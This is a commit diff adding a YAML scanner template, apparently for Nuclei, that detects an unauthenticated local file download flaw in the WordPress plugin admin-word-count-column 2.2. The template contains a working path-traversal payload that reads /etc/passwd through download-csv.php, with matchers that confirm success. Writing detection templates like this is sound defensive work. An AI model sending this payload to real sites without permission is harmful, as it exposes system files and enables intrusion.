Create admin-word-count-column-lfi.yaml
parent
64d302f963
commit
10fe7186ca
|
@ -0,0 +1,23 @@
|
|||
id: admin-word-count-column-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin admin-word-count-column 2.2 - Unauthenticated Local File Download
|
||||
author: daffainfo,Splint3r7
|
||||
severity: high
|
||||
reference: https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue